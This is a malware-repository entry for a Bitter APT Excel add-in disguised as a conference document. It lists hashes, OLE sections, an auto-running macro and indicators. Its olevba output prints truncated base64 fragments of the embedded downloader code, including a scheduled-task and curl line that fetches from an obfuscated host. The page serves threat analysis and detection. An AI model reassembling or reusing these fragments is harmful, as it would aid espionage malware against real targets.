MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Bitter


Vendor detections: 17


Maldoc score: 40


Intelligence 17 IOCs YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207
SHA3-384 hash: b5c5740576559119020520b7674cc5dfe8f653827540ec64f9fca372f4da3593668eee9b8d77ba66e3ab450ebcb81e56
SHA1 hash: eb3032c062c9dc36100a4af9a501bc8fc118567d
MD5 hash: b165b489c5f8c4e136364664502d68f1
humanhash: idaho-colorado-black-lima
File name:Nominated Officials for the Conference.xlam
Download: download sample
Signature Bitter
Create hunting rule
File size:67'425 bytes
First seen:2025-10-11 08:27:39 UTC
Last seen:2025-10-18 12:43:49 UTC
File type:Excel file xlsx
MIME type:application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep 1536:qIPWYuaHRSxkveXmZhUgaUMLW7XRZYDOyMlDQKq/eT9lr:qIPWGH4xDSI+2KDQK0ebr
TLSH T1636301CAC1A47953CA356BBF96D434D264A8BCD5D794E30435099017F34EE6F0F60ACA
TrID 50.8% (.XLSM) Excel Microsoft Office Open XML Format document (with Macro) (57500/1/12)
30.0% (.XLSX) Excel Microsoft Office Open XML Format document (34000/1/7)
15.4% (.ZIP) Open Packaging Conventions container (17500/1/4)
3.5% (.ZIP) ZIP compressed archive (4000/1)
Magika xlsx
Reporter smica83
Tags:apt Bitter xlsx

Office OLE Information

This malware samples appears to be an Office document. The following table provides more information about this document using oletools and oledump.

OLE id
Maldoc score: 40
File Format is MS Excel 2007+
Container Format is OpenXML
Office document contains VBA Macros
OLE dump

MalwareBazaar was able to identify 13 sections in this file using oledump:

Section IDSection sizeSection name
A1650 bytesPROJECT
A2104 bytesPROJECTwm
A3993 bytesVBA/Sheet1
A4993 bytesVBA/Sheet2
A5993 bytesVBA/Sheet3
A6107545 bytesVBA/ThisWorkbook
A710093 bytesVBA/_VBA_PROJECT
A81657 bytesVBA/__SRP_0
A9114 bytesVBA/__SRP_1
A10448 bytesVBA/__SRP_2
A11256 bytesVBA/__SRP_3
A12826 bytesVBA/dir
OLE vba

MalwareBazaar was able to extract and deobfuscate VBA script(s) the following information from OLE objects embedded in this file using olevba:

TypeKeywordDescription
AutoExecWorkbook_OpenRuns when the Excel Workbook is opened
Base64rivate boolprivate bool bU publprivat return apublic voidCoyoteCompute ifcml2YXRlIGJvb2wgYkluaXRpYWxpc2VkID0gZmFsc2U7I
Base64public bool Useful getIA0KDQoJCXB1YmxpYyBib29sIFVzZWZ1bA0KCQl7ICAgD
Base64tstringdA0KICAgICAgICAgICAgICAgIHN0cmluZyBheHggPSBna
Base64 return setCgkJCQlyZXR1cm4gYlVzZWZ1bDsNCgkJCX0gICANCgkJC
Base64public partial classcHVibGljIHBhcnRpYWwgY2xhc3MgTWFpbldpbmRvdw0KI
Base64q-------------------ow.Ticks.ToStrcS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0iICsgRGF0Z
Base64HttpWebRequestrequest.ICAgICAgICAgICAgICAgIEh0dHBXZWJSZXF1ZXN0IHJlc
Base64t ushortdCB1c2hvcnQgSU1BR0VfRE9TX1NJR05BVFVSRSA9IDB4N
Base64 const uintIGNvbnN0IHVpbnQgSU1BR0VfTlRfU0lHTkFUVVJFID0gM
Base645IOX1q2/nikT0cEHgCPfNUlPWDFxMi9uaWtUMGNFSGdDUGZiRlNjbnd2T3VtL1V4T
Base64 const ushortDQogICAgICAgIGNvbnN0IHVzaG9ydCBJTUFHRV9GSUxFX
Base64request.ContentTyperequest.KeepArequestStrICAgICAgICAgICByZXF1ZXN0LkNvbnRlbnRUeXBlID0gI
Base64// striICAgICAgICAgICAgICAgICAgICByZXF1ZXN0U3RyZWFtL
Base64ng formDataTemplatevx8GpAIgHbD3WvbmcgZm9ybURhdGFUZW1wbGF0ZSA9IGdqZmRrZ2l0amtnK
Base64XlxzFivquiNM6uAG13ApqCtTVey7VmIUyqWGx4ekZpdnF1aU5NNnVBRzEzQXBLSHV2TDFNLytUY2RSa
Base64IMAGE_FILE_MACHINE_AAMD64SU1BR0VfRklMRV9NQUNISU5FX0FNRDY0ID0gMHg4NjY0O
Base64n/ITaeTKg2g4Na8uWrAmz6rPOP6g2Xu3rHbi9JVGFlVEtnMmc0TmE4dVdyQW1sNjFSSlZKdzh2K0F5a
Base64 const ushort IMAGE_IGNvbnN0IHVzaG9ydCBJTUFHRV9OVF9PUFRJT05BTF9IR
Base64AN5iHJrjkwU/enaNub8JDisposition: fQU41aUhKcmprd1UvZW5hTnViOEpwL3c9PSIpOy8vICJDb
Base64 stringDisposition: forICAgc3RyaW5nIGZvcm1EYXRhVGVtcGxhdGUgPSAiQ29ud
Base64/ PE32LyBQRTMyDQogICAgICAgIGNvbnN0IHVzaG9ydCBJTUFHR
Base64ncoding.UTF8.GetByteformItemBytes.LeEncoding.bmNvZGluZy5VVEY4LkdldEJ5dGVzKGZvcm1JdGVtKTsNC
Base64 requeICAgICAgICAgICAgICAgcmVxdWVzdFN0cmVhbS5Xcml0Z
Base64ebResponse responseZWJSZXNwb25zZSByZXNwb25zZSA9IHJlcXVlc3QuR2V0U
Base64 static static striCiAgICAgICAgc3RhdGljIHN0cmluZyBteW5tID0gIiI7D
Base64 usingICAgICAgICB1c2luZyAoU3RyZWFtUmVhZGVyIHJlYWRlc
Base64 static stringICAgc3RhdGljIHN0cmluZyBtYmlzID0gIiI7DQoNCiAgI
Base64response.GetResponsecmVzcG9uc2UuR2V0UmVzcG9uc2VTdHJlYW0oKSkpDQogI
Base64 static staticprivate st pDQogICAgICAgIHN0YXRpYyBSYW5kb20gcmQ7DQogICAgI
Base64string responseTextRemoveSpecialCharequest.AbICAgICAgICAgICAgICAgICBzdHJpbmcgcmVzcG9uc2VUZ
Base64ublic static stringdWJsaWMgc3RhdGljIHN0cmluZyBSZW1vdmVTcGVjaWFsQ
Base64 Thread myNewThreadtaskprogressAsICBUaHJlYWQgbXlOZXdUaHJlYWQgPSBuZXcgVGhyZWFkK
Base64 else ifICAgICAgICAgICBlbHNlIGlmIChjID09ICcjJyAmJiBjb
Base64ortant bitonentModel.RunInstalb3J0YW50IGJpdA0KDQoJW1N5c3RlbS5Db21wb25lbnRNb
Base64bool IsNullOrWhiteSp iYm9vbCBJc051bGxPcldoaXRlU3BhY2UoU3RyaW5nIHZhb
Base64ll.Installerprivate staticstring Base64Decode varbase64Encodedbase64EncodedDbGwuSW5zdGFsbGVyDQoJew0KCQlwcml2YXRlIHN0YXRpY
Base64 public staticICAgICAgcHVibGljIHN0YXRpYyBzdHJpbmcgZ2pmZGtna
Base64 plaintexkeCgkJCQlwbGFpbnRleHQuQXBwZW5kKChjaGFyKSgodWlud
Base64kgahslKDSJDLiuohaSKs stringEncrypt cia2dhaHNsS0RTSkRMaXVvaGFTS3NrYWxzIjsNCiAgICAgI
Base64return plaintext.ToSpublic overrCQlyZXR1cm4gcGxhaW50ZXh0LlRvU3RyaW5nKCk7DQoJC
Base64 cs.WrcipherBytes.LeICAgICAgICAgICAgICAgY3MuV3JpdGUoY2lwaGVyQnl0Z
Base64 trystring queICAgICAgICB0cnkNCiAgICAgICAgICAgIHsNCiAgICAgI
Base64 ManagemenICAgICAgICAgICBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZ
Base64nagementObjectSearchbmFnZW1lbnRPYmplY3RTZWFyY2hlcik7DQogICAgICAgI
Base64ManagementObjectSear foreTWFuYWdlbWVudE9iamVjdFNlYXJjaGVyKHF1ZXJ5KTsNC
Base64 tryICAgICAgICAgIHRyeQ0KICAgICAgICAgICAgICAgIHsNC
Base64ManagementObjectSearKwwDqlCjADdIRpTWFuYWdlbWVudE9iamVjdFNlYXJjaGVyIG9iak9TID0gZ
Base64lsyMxzrKTsD4xnQnhVBsbHN5TXh6cktUc0Q0eG5RbmhWQnM9IikgKyBsb2NhdGlvb
Base64jMgmt in return return staticIMAGE_DOS_HEADER Get strea returnReadSak1nbXQgaW4gb2JqT1MuR2V0KCkpDQogICAgICAgICAgI
Base64 static IMAGECg0KICAgICAgICBzdGF0aWMgSU1BR0VfTlRfSEVBREVSU
Base64 staticICAgICBzdGF0aWMgSU1BR0VfTlRfSEVBREVSUzMyIEdld
Base64 return RIMAGE_NT_HEA staticIMAGE_NTDQogICAgICAgICAgICByZXR1cm4gUmVhZFN0cnVjdEZyb
Base64_HEADERS64IMAGE_DOS_HEAD returnX0hFQURFUlM2NCBHZXROdEhlYWRlcjY0KFN0cmVhbSBzd
Base64 ReadStructFromStreaIFJlYWRTdHJ1Y3RGcm9tU3RyZWFtPElNQUdFX05UX0hFQ
Base64ader.OptionalHeader.TIONAL_HDR32_M static boolYWRlci5PcHRpb25hbEhlYWRlci5NYWdpYyA9PSBJTUFHR
Base64MAGE_NT_HEADERS64 reTUFHRV9OVF9IRUFERVJTNjQgbnRIZWFkZXIpDQogICAgI
Base64turn ntHeader.OptionIMAGE_NT_OPTIONA static TReadStru tryMarshal.AllocCodHVybiBudEhlYWRlci5PcHRpb25hbEhlYWRlci5NYWdpY
Base64new InvalidOperation MabmV3IEludmFsaWRPcGVyYXRpb25FeGNlcHRpb24oKTsNC
Base64 Marsh publicstatic bool IsValiICAgICAgICAgICAgICAgTWFyc2hhbC5GcmVlQ29UYXNrT
Base64ERS_COMMON ntHeaderRVJTX0NPTU1PTiBudEhlYWRlciA9IEdldENvbW1vbk50S
Base64 returnICAgICAgICAgcmV0dXJuIGZhbHNlOw0KDQogICAgICAgI
Base64ntHeader.FileHeader.bnRIZWFkZXIuRmlsZUhlYWRlci5NYWNoaW5lKQ0KICAgI
Base64 case IMAGE_FILE_MICAgICAgICAgICAgICAgICAgICAgICBjYXNlIElNQUdFX
Base64 returnICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJldHVyb
Base64 case IMAGE_FILE_MAICBjYXNlIElNQUdFX0ZJTEVfTUFDSElORV9JQTY0Og0KI
Base64 return IsVanvalidOperationExcepICAgICAgICAgcmV0dXJuIElzVmFsaWRFeGU2NChHZXROd
Base64etFileNameWithoutExtZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24oZmlsZXBhd
Base64 doICBkbw0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgI
Base64 return //pDQogICAgICAgICAgICByZXR1cm4gZmlsZXBhdGg7DQogI
Base64ublic static async // var // va /dWJsaWMgc3RhdGljIGFzeW5jIFRhc2s8c3RyaW5nPiBEb
Base64/ bool //LyAgICAgICAgYm9vbCBoYXNQcm9ncmVzQ2hhbmdlZCA9I
Base64voiddm9pZCB0aW1lckhhbmRsZXIob2JqZWN0IHMsIEVsYXBzZ
Base64 //ICAgICAgIC8vICAgICAgICAgICAgaWYgKGhhc1Byb2dyZ
Base64eZQ0KICAgICAgICAvLyAgICAgICAgICAgIHsNCiAgICAgI
Base64 //DQogICAgICAgIC8vICAgICAgICAgICAgfQ0KICAgICAgI
Base64 // voidICAvLyAgICAgICAgdm9pZCBDbGVhblJlc291cmNlcygpD
Base64 // //ICAgICAgIC8vICAgICAgICBjYXRjaCAoRXhjZXB0aW9uI
Base64 return await staICAgIHJldHVybiBhd2FpdCB0Y3MuVGFzazsNCiAgICAgI
Base64tic private booldGljIHByaXZhdGUgYm9vbCBnamZka2dpdGprZygpDQogI
Base64 Process tryIFByb2Nlc3MgcmVxdWVzdFByb2Nlc3MgPSBuZXcgUHJvY
Base64 requCiAgICAgICAgICAgICAgICByZXF1ZXN0UHJvY2Vzcy5Td
Base64s.StartInfo.FileNamecy5TdGFydEluZm8uRmlsZU5hbWUgPSBwX2dsb2JsZTsvL
Base64 requestProcICAgICAgICAgcmVxdWVzdFByb2Nlc3MuU3RhcnRJbmZvL
Base64requestProcess.Start ifcmVxdWVzdFByb2Nlc3MuU3RhcnQoKSAtLSAwIik7DQogI
Base64 //Debug.WritrequestProcess returnsucc staticprivate async Tasktas trICAgICAgICAvL0RlYnVnLldyaXRlTGluZSgiZ2pmZGtna
Base64yeQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgI
Base64t.SpecialFolder.AppldC5TcGVjaWFsRm9sZGVyLkFwcGxpY2F0aW9uRGF0YSkgK
Base64ronment.GetFolderPatlFolder.Commoncm9ubWVudC5HZXRGb2xkZXJQYXRoKEVudmlyb25tZW50L
Base64lt:Environment.SpbHQ6DQogICAgICAgICAgICAgICAgICAgICAgICB7DQogI
Base64ecialFolder.ApplicatZWNpYWxGb2xkZXIuQXBwbGljYXRpb25EYXRhKSArICJcX
Base64ntManager.ServerCertbnRNYW5hZ2VyLlNlcnZlckNlcnRpZmljYXRlVmFsaWRhd
Base64nager.Expect100ContiServibmFnZXIuRXhwZWN0MTAwQ29udGludWUgPSB0cnVlOw0KI
Base64cePointManager.SecurSecurityProtocolTypeY2VQb2ludE1hbmFnZXIuU2VjdXJpdHlQcm90b2NvbCA9I
Base64.TlsLlRscw0KICAgICAgICAgICAgICAgICAgICAgICB8IFNlY
Base64s11czExDQogICAgICAgICAgICAgICAgICAgICAgIHwgU2Vjd
Base6412MTINCiAgICAgICAgICAgICAgICAgICAgICAgfCBTZWN1c
Base64FA3wdvGYiv/k1y9oLsJrRkEzd2R2R1lpdi9rMXk5b0xzSnJYUThDd29vaTJjRjZBc
Base64nKgkHRqEpzABSkE8VWIlbktna0hScUVwekFCU2tFOFZXSWxhbTQ3cWhQWjdpY3pzN
Base64iC1to413bIeL/tTS3GKhaUMxdG80MTNiSWVML3RUUzNHS2g1dFQ4OXMxRWduYlJWO
Base64engCmaO/M70IHZBIXPdUZW5nQ21hTy9NNzBJSFpCSVhQZFVDeUtPL2UyREdLeExQd
Base64 usingICAgIHVzaW5nIChIdHRwQ2xpZW50IGNsaWVudCA9IG5ld
Base64Runtime.InteropServiusing System.Security.CryptoUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTe
Base64HttpResponseMessage rICAgICAgICAgICAgICAgSHR0cFJlc3BvbnNlTWVzc2FnZ
Base64space Coyotec3BhY2UgQ295b3RlDQp7DQoJW1N0cnVjdExheW91dChMY
Base64esponse.EnsureSuccesZXNwb25zZS5FbnN1cmVTdWNjZXNzU3RhdHVzQ29kZSgpO
Base64 // Try toICAgICAgICAvLyBUcnkgdG8gZ2V0IGZpbGVuYW1lIGZyb
Base64n headerbiBoZWFkZXINCg0KDQogICAgICAgICAgICAgICAgICAgI
Base64tent.Headers.ContentdGVudC5IZWFkZXJzLkNvbnRlbnREaXNwb3NpdGlvbiAhP
Base64 public// Minimum extra parICAgICAgICBwdWJsaWMgdXNob3J0IGVfbWluYWxsb2M7I
Base64 string fileNameICAgICBzdHJpbmcgZmlsZU5hbWUgPSBudWxsOw0KICAgI
Base64agraphs neededYWdyYXBocyBuZWVkZWQNCiAgICAgICAgcHVibGljIHVza
Base64aximum extraYXhpbXVtIGV4dHJhIHBhcmFncmFwaHMgbmVlZGVkDQogI
Base64ontentDisposition.Fib250ZW50RGlzcG9zaXRpb24uRmlsZU5hbWU7DQogICAgI
Base64 // p_gICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgI
Base64 //ICAgICAgICAgICAgICAgICAgLy8gU2F2ZSB0aGUgcmVzc
Base64 public ushortaddress of reloICAgICBwdWJsaWMgdXNob3J0IGVfbGZhcmxjOyAgIC8vI
Base64cation tableY2F0aW9uIHRhYmxlDQogICAgICAgIHB1YmxpYyB1c2hvc
Base64response.Content.ReacmVzcG9uc2UuQ29udGVudC5SZWFkQXNTdHJlYW1Bc3luY
Base64 usingICAgICAgICAgdXNpbmcgKEZpbGVTdHJlYW0gZnMgPSBuZ
Base64rlay numbercmxheSBudW1iZXINCiAgICAgICAgcHVibGljIHVpbnQgZ
Base64 await stream.Copycatcstring cSystem.IOICAgYXdhaXQgc3RyZWFtLkNvcHlUb0FzeW5jKGZzKTsNC
Base64 System.BuffICAgICAgICAgU3lzdGVtLkJ1ZmZlci5CbG9ja0NvcHkoY
Base64rvedcnZlZA0KICAgICAgICBwdWJsaWMgdWludCBlX3JlczI7I
Base64 stringSystem.IO.Path.ChanaIbETxENCwM1KQICAgICAgICBzdHJpbmcgcF9nbG9ibGUxID0gc3BhdGggK
Base64 public ushortICAgICAgIHB1YmxpYyB1c2hvcnQgZV9vZW1pZDsgICAgL
Base64 //ifICAgICAgICAgICAvL2lmICh0LklzQ29tcGxldGVkID09I
Base64 // ReservedICAgICAvLyBSZXNlcnZlZA0KICAgICAgICBwdWJsaWMgd
Base64 ReservedIFJlc2VydmVkDQogICAgICAgIHB1YmxpYyB1aW50IGVfc
Base64 // codeICAgICAgICAgICAgLy8gY29kZSA9ICIwMDBCIjsNCiAgI
Base64edZWQNCiAgICAgICAgcHVibGljIHVpbnQgZV9yZXM3OyAgI
Base64 stringICAgICAgICAgICAgc3RyaW5nIGZoZ2xoID0gZ2pmZGtna
Base64 public intFile address of newICAgICBwdWJsaWMgaW50IGVfbGZhbmV3OyAgICAgIC8vI
Base64iv/k1y9oLsJrXQ8Cwooi5I6sw8nKgkHRqEaXYvazF5OW9Mc0pyWFE4Q3dvb2kyY0Y2QXEyelpUQU5tK
Base64exe headeryoutKind.SequenZXhlIGhlYWRlcg0KICAgIH0NCiAgICBbU3RydWN0TGF5b
Base64pzABSkE8VWIlam47qhPZcHpBQlNrRThWV0lsYW00N3FoUFo3aWN6czVuWFZXaUNCY
Base64ublic ushort publicushort NumberOfSdWJsaWMgdXNob3J0IE1hY2hpbmU7DQogICAgICAgIHB1Y
Base64bIeL/tTS3GKh5tT89s1E6F4HBkF0ThwWGN i catYkllTC90VFMzR0toNXRUODlzMUVnbmJSVjhvR1Q4NytiS
Base64public uint PointerT public uintcHVibGljIHVpbnQgUG9pbnRlclRvU3ltYm9sVGFibGU7D
Base64erCertificateValidatZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9I
Base64ct IMAGE_OPTIONAL_HEY3QgSU1BR0VfT1BUSU9OQUxfSEVBREVSMzINCiAgICB7D
Base64 public byte publicICAgICAgcHVibGljIGJ5dGUgTWlub3JMaW5rZXJWZXJza
Base64 Secur
Base64 public uint publICAgICAgICBwdWJsaWMgdWludCBBZGRyZXNzT2ZFbnRye
Base64 public uint public uintSeICAgICAgICBwdWJsaWMgdWludCBJbWFnZUJhc2U7DQogI
Base64 public ushort MICAgICBwdWJsaWMgdXNob3J0IE1pbm9yT3BlcmF0aW5nU
Base64 HttpWebRequestICAgICAgSHR0cFdlYlJlcXVlc3QgcmVxdWVzdCA9IChId
Base64 //ICAgICAgICAgICAgICAgLy8gcmVxdWVzdC5Db250ZW50V
Base64 public ushort public usICAgcHVibGljIHVzaG9ydCBNYWpvckltYWdlVmVyc2lvb
Base64hort publicushort MajorSuaG9ydCBNaW5vckltYWdlVmVyc2lvbjsNCiAgICAgICAgc
Base64HXuWAGqqkgTsX/mLUGgsSFh1V0FHcXFrZ1RzWC9tTFVHZ3N6SXgvaVVJcW1XdW81c
Base64 public uint public uintSizeOICAgcHVibGljIHVpbnQgU2l6ZU9mSW1hZ2U7DQogICAgI
Base64/nikT0cEHgCPfbFScnwvL25pa1QwY0VIZ0NQZmJGU2Nud3ZPdW0vVXhOOW5aUT09I
Base64request.ContentTypeICAgIHJlcXVlc3QuQ29udGVudFR5cGUgPSAibXVsdGlwY
Base64equest.GetRequestStrZXF1ZXN0LkdldFJlcXVlc3RTdHJlYW0oKSkNCiAgICAgI
Base64 public uint public uICAgICAgcHVibGljIHVpbnQgU2l6ZU9mU3RhY2tDb21ta
Base64 requestICAgICAgICAgICAgIHJlcXVlc3RTdHJlYW0uV3JpdGUoY
Base64int public uintSizeOfHeapaW50IFNpemVPZkhlYXBSZXNlcnZlOw0KICAgICAgICBwd
Base64quiNM6uAG13ApKHuvL1M7VmIUyqn/ITaeTcXVpTk02dUFHMTNBcEtIdXZMMU0vK1RjZFJrV1ZhOHovc
Base64lic uint structIMAGE_OPTIONAL_HbGljIHVpbnQgTnVtYmVyT2ZSdmFBbmRTaXplczsNCiAgI
Base64Kg2g4Na8uWrAml61RJVJg2Xu3rHAN5iHJrDisposition: form-datstS2cyZzROYTh1V3JBbWw2MVJKVkp3OHYrQXloVVNIWlM3e
Base64EADER64 publicRUFERVI2NA0KICAgIHsNCiAgICAgICAgcHVibGljIHVza
Base64ringDisposition: form-datstrirequescmluZyBmb3JtRGF0YVRlbXBsYXRlID0gIkNvbnRlbnQtR
Base64public byte public byteMcHVibGljIGJ5dGUgTWFqb3JMaW5rZXJWZXJzaW9uOw0KI
Base64 public uint SICAgICAgIHB1YmxpYyB1aW50IFNpemVPZkluaXRpYWxpe
Base64 requestStretrailer.LengtICAgICAgICAgcmVxdWVzdFN0cmVhbS5Xcml0ZSh0cmFpb
Base64 usingICB1c2luZyAoU3RyZWFtUmVhZGVyIHJlYWRlciA9IG5ld
Base64lic uint SizeOfUnini public uintbGljIHVpbnQgU2l6ZU9mVW5pbml0aWFsaXplZERhdGE7D
Base64se.GetResponseStreamc2UuR2V0UmVzcG9uc2VTdHJlYW0oKSkpDQogICAgICAgI
Base64 public ulong public uintDQogICAgICAgIHB1YmxpYyB1bG9uZyBJbWFnZUJhc2U7D
Base64 stringICAgICAgICAgICBzdHJpbmcgcmVzcG9uc2VUZXh0ID0gc
Base64 publicDQogICAgICAgIHB1YmxpYyB1c2hvcnQgTWFqb3JPcGVyY
Base64 public ushort publicICAgICAgcHVibGljIHVzaG9ydCBNYWpvckltYWdlVmVyc
Base64 ushort publicushort MajoIHVzaG9ydCBNaW5vckltYWdlVmVyc2lvbjsNCiAgICAgI
Base646HuoLAYhYHSz6HTZTmLYOSArchitectureNkh1b0xBWWhZSFN6NkhUWlRtTFlZa2FubnYiKSwgbnVsb
Base64 public uint public uintSiICAgICAgcHVibGljIHVpbnQgU2l6ZU9mSW1hZ2U7DQogI
Base64 System.IO.Path.CombwCZFw4ZjLxXShrtryIFN5c3RlbS5JTy5QYXRoLkNvbWJpbmUoU3lzdGVtLklPL
Base64 File.WriteICAgICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KGZuYW1lL
Base64ublic ushort publicushort DllChardWJsaWMgdXNob3J0IFN1YnN5c3RlbTsNCiAgICAgICAgc
Base64 catchICAgICBjYXRjaCAoRXhjZXB0aW9uIGV4KQ0KICAgICAgI
Base64ServicePointManager.U2VydmljZVBvaW50TWFuYWdlci5TZXJ2ZXJDZXJ0aWZpY
Base64 public ulong pubDQogICAgICAgIHB1YmxpYyB1bG9uZyBTaXplT2ZTdGFja
Base64lic ulong public ulongSizbGljIHVsb25nIFNpemVPZkhlYXBSZXNlcnZlOw0KICAgI
Base64icePointManager.ExpeaWNlUG9pbnRNYW5hZ2VyLkV4cGVjdDEwMENvbnRpbnVlI
Base64 public uint struct IMAGE_NT_ICAgIHB1YmxpYyB1aW50IE51bWJlck9mUnZhQW5kU2l6Z
Base64 ServicePointManICAgICBTZXJ2aWNlUG9pbnRNYW5hZ2VyLlNlY3VyaXR5U
Base64HEADERS_COMMON public uintSEVBREVSU19DT01NT04NCiAgICB7DQogICAgICAgIHB1Y
Base64otocolType.Tlsb3RvY29sVHlwZS5UbHMNCiAgICAgICAgICAgICAgICAgI
Base64t IMAGE_NT_HEADERS32 public uintSignadCBJTUFHRV9OVF9IRUFERVJTMzINCiAgICB7DQogICAgI
Base64colType.Tls11Y29sVHlwZS5UbHMxMQ0KICAgICAgICAgICAgICAgICAgI
Base64olType.Tls12b2xUeXBlLlRsczEyDQogICAgICAgICAgICAgICAgICAgI
Base64 public IMAGE_ICAgICAgIHB1YmxpYyBJTUFHRV9PUFRJT05BTF9IRUFER
Base64sJrXQ8Cwooi2cF6Aq2zZkHRqEpzABSkE8Vc0pyWFE4Q3dvb2kyY0Y2QXEyelpUQU5tK2NoRDFmcDVJN
Base64 structICAgc3RydWN0IElNQUdFX05UX0hFQURFUlM2NA0KICAgI
Base64WIlam47qhPZ7iczs5nXVV0lsYW00N3FoUFo3aWN6czVuWFZXaUNCYWNsSzhsdkE3c
Base64GKh5tT89s1EgnbRV8oAPR0toNXRUODlzMUVnbmJSVjhvQVBDcnVFWVpLOU1DZzVIb
IOCkefe.batExecutable file name
IOCcsc.exeExecutable file name
IOCmsoffice365.dllExecutable file name
IOCHttp.dllExecutable file name
IOCvlcplayer.dllExecutable file name
IOCInstallUtil.exeExecutable file name
String// Replace with yourserver endpoinCB5b3VyIHNlcnZlciBlbmRwb2lu
Stringstring f--axxyyppqCAgICAgICAgICAgIHN0cmluZyBm
StringMainWindow consCAgIHsNCg0KICAgICAgICBjb25z
String //regjfdkgi29udGVudFR5cGUgPSBnamZka2dp
StringIMAGE_DOS_SIGNATUREUE0RDsgIC8vIE1aDQogICAgICAg
String/mLUGgszIx/iUIqmWuo5pKgTYkEX/fUbu5XFtV3VvNXBLZ1RZa0VYL2ZVYnU1
StringIMAGE_FILE_MACHINE_I01BQ0hJTkVfSTM4NiA9IDB4MDE0
String const ushortIMAGE_FILE_MACH2hvcnQgSU1BR0VfRklMRV9NQUNI
String// Intel 64 const ushortCAgICAgICBjb25zdCB1c2hvcnQg
StringNT_OPTIONAL_HDR32_MAFIzMl9NQUdJQyA9IDB4MTBCOyAv
String const ushortIMAGE_NT_OPTIONAL_HDR64_M const ushortIMAGE_FV9OVF9PUFRJT05BTF9IRFI2NF9N
String staticWMgc3RyaW5nIG1pZGkgPSAiIjsN
StringRemoveSpecialCharact int f2hhcmFjdGVycyhzdHJpbmcgc3Ry
String myNewThread.Starelsenew RandoCAgICBteU5ld1RocmVhZC5TdGFy
String Thre // The impChyZC5OZXh0KDUsIDEwKSAqIDEw
String else re publicstaticD09ICcjJyAmJiBjb3VudCA9PSAx
String public classSample : System.Configuration.InstaS5Db25maWd1cmF0aW9uLkluc3Rh
String returnHRydWU7DQogICAgICAgIH0NCiAg
String return System.Text.Encoding.UTF8.Getprivate stringXORDecryp var plaintexGluZy5VVEY4LkdldFN0cmluZyhi
StringstringcipherTe //stringXRqa2coc3RyaW5nIGNpcGhlclRl
StringConvert.FromBase64StmFzZTY0U3RyaW5nKGNpcGhlclRl
Stringystem.Collections.IDictionary save MainWindow/f /sc minute /mo 26--headless cmd /v:onW9ucy5JRGljdGlvbmFyeSBzYXZlJiBzZXQgNjY1PXRwczomIHNldCA1NjU9ITc2NSEhNjY1IRyZW5kcyYgY3VybCAhNDY1IS5jb20vZDZaMi5wXmhecD9code and P-code are different, this may havebeen used to hide malicious code
String usingXB0b3IgPSBBZXMuQ3JlYXRlKCkp
StringRfc2898DeriveBytespd//Rfc2898mZjMjg5OERlcml2ZUJ5dGVzIHBk
Stringnew Rfc2898DeriveByt usmVCeXRlcyhFbmNyeXB0aW9uS2V5
Stringencryptor.CreateDecrWF0ZURlY3J5cHRvcigpLCBDcnlw
String publicstatic stringmcgdWZyaXVma3NkKHN0cmluZyBj
String if elsewhereCIiIHx8IHdoZXJlID09IG51bGwp
StringtObjectSearcherXIgb2JqT1MgPSBkZWZhdWx0KE1h
Stringbject objMgmt inGluIG9iak9TLkdldCgpKQ0KICAg
String catchCAgICAgICAgICAgew0KICAgICAg
StringaseObject obmFnZW1lbnRCYXNlT2JqZWN0IG9i
String_NT_HEADERS_COMMONGetCommonNtH19DT01NT04gR2V0Q29tbW9uTnRI
StringIMAGE_DOS_HEADERURFUiBkb3NIZWFkZXIpDQogICAg
String stream.S0hlYWRlci5lX2xmYW5ldywgU2Vl
String returnReadStructFromStrem4gUmVhZFN0cnVjdEZyb21TdHJl
StringIMAGE_NT_HEADERS32stE50SGVhZGVyMzIoU3RyZWFtIHN0
String static boolT_H returnntHemFsaWRFeGUzMihJTUFHRV9OVF9I
String ifCAgICBpZiAobWVtb3J5ID09IElu
Stringthrow newInvalidOperaHJvdyBuZXcgSW52YWxpZE9wZXJh
String int ifthrowCAgIGludCBieXRlc1JlYWQgPSBz
Stringrshal.PtrToStructure finallynVjdHVyZShtZW1vcnksIHR5cGVv
StringIMAGE_NT_HEADCAgICAgICBJTUFHRV9OVF9IRUFE
StringifGVhZGVyLlNpZ25hdHVyZSAhPSBJ
String return falader.ChCAgICAgICAgICByZXR1cm4gZmFs
StringACHINE_I386:0ZJTEVfTUFDSElORV9JMzg2Og0K
StringCHINE_IA64:CAgICAgICAgICAgICAgICAgICAg
StringACHINE_AMD64:QogICAgICAgICAgICAgICAgICAg
Stringstatic string GetUni if stXRVbmlxdWVGaWxlUGF0aChzdHJp
String.IO.Path.GetDirectorSystem.IO.Path.GXJlY3RvcnlOYW1lKGZpbGVwYXRo
StringSystem.IO.Path.GetExC5HZXRFeHRlbnNpb24oZmlsZXBh
String intSAxOw0KICAgICAgICAgICAgICAg
String.Path.Combinnumb w3lzdGVtLklPLlBhdGguQ29tYmlu
Stringnew System.Timers.Ti //var //void dohangedEventAr //nMuVGltZXIobmV3IFRpbWVTcGFu
String //CAgICB0aW1lci5TdG9wKCk7DQog
Stringif /XNDaGFuZ2VkKQ0KICAgICAgICAv
String //falsHJvZ3Jlc0NoYW5nZWQgPSBmYWxz
String // //elsCAgIC8vICAgICAgICAgICAgZWxz
String // //CAgLy8gICAgICAgICAgICAgICAg
String //tcs.TrySeCAgICAgICAgICAgdGNzLlRyeVNl
Stringclient.DownloadProgressChanged25sb2FkUHJvZ3Jlc3NDaGFuZ2Vk
String //client.DisCAgICAgICAgICBjbGllbnQuRGlz
String //timerHWVyLkVsYXBzZWQgLT0gdGltZXJI
